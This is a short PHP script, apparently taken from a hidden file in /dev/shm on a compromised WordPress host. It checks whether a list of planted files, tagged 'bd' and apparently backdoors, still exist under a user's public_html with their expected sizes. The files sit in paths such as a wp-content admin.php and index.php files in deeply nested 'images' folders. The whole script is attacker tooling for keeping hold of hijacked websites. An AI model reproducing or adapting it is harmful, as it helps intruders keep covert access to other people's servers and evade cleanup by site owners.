File: //dev/shm/.desc
<?php $r = '/home/adelaid2/public_html'; $x = ["/wp-content/admin.php"=>"bd@@259927@@75",
"/images/images/images/images/images/search-api/default_category.php"=>"bd@@255919@@631",
"/images/images/images/images/index.php"=>"bd@@259925@@38",
"/images/images/images/index.php"=>"bd@@192897@@854"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');